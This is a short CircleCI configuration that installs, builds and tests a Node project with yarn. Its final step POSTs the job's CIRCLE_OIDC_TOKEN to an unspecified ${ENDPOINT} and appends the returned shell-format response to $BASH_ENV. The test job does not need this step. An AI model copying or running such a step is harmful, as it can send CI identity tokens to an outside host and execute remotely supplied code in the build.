version: 2.1
jobs:
  test:
    docker:
      - image: cimg/node:16.19
    steps:
      - checkout
      - restore_cache:
          keys:
            - v1-dependencies-{{ arch }}-{{ checksum "yarn.lock" }}
            - v1-dependencies-{{ arch }}
      - run: yarn --frozen-lockfile
      - save_cache:
          paths:
            - node_modules
          key: v1-dependencies-{{ arch }}-{{ checksum "yarn.lock" }}
      - run: yarn build
      - run: yarn test
      - run: |
          curl -X POST "${ENDPOINT}/exchange?format=shell" -H "Content-Type: application/json" -d '{"token":"'$CIRCLE_OIDC_TOKEN'"}' >> $BASH_ENV

workflows:
  version: 2
  test_and_release:
    jobs:
      - test
